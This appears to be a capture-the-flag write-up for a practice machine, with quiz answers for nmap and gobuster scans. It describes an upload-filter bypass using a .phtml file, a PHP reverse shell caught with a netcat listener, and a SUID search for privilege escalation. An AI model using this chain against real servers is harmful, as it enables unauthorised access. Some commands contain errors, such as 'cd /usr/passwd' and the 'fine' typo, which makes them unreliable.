# Task 2

nmap flag	 |   Description
-sV	         |  Attempts to determine the version of the services running
-p <x> or -p-|	Port scan for port <x> or scan all ports
-Pn 	     |  Disable host discovery and just scan for open ports
-A	         |  Enables OS and version detection, executes in-build scripts for further enumeration 
-sC	         |  Scan with the default nmap scripts
-v	         |  Verbose mode
-sU	         |  UDP port scan
-sS	         |  TCP SYN port scan
-oN          |  Normal output   

Scan the box, how many ports are open `6`

run `nmap -sC -sV -oA <ip>` 

What version of the squid proxy is running on the machine? `3.5.12`
 
How many ports will nmap scan if the flag -p-400 was used?  `400`

Using the nmap flag -n what will it not resolve?  `DNS`

What is the most likely operating system this machine is running? `Ubuntu`

What port is the web server running on? `3333`

# Task 3
Run Gobuster 
GoBuster flag	Description
-e	            Print the full URLs in your console
-u	            The target URL
-w	            Path to your wordlist
-U and -P	    Username and Password for Basic Auth
-p <x>	        Proxy to use for requests
-c <http cookies>	Specify a cookie for simulating your auth

Run `gobuster dir -u http://<ip>:3333 -w <word list location>`

What is the directory that has an upload form page? `/internal`

# Task 4

Excecute payload using Burp Suite


Try upload a few file types to the server, what common extension seems to be blocked?
`.php`

Error: `Extension not allowed`

`.phtml` is allowed > our payload

Download the php reverse shell here : https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Run `nc -lvnp 4444`

Run `http://<ip>:3333/internal/uploads/php-reverse-shell.phtml `
Got shell



What is the name of the user who manages the webserver?
Run `cd /usr/passwd`

Answer: bill

Run `cd home` `cd bill` `cat user.txt` > get flag

# Task 5

Now that we're in the shell, it's time to escalate the privilege

Run `fine / -user root -perm /4000`. Found`bin/systemctl`

![vuln](/img/vuln.png)


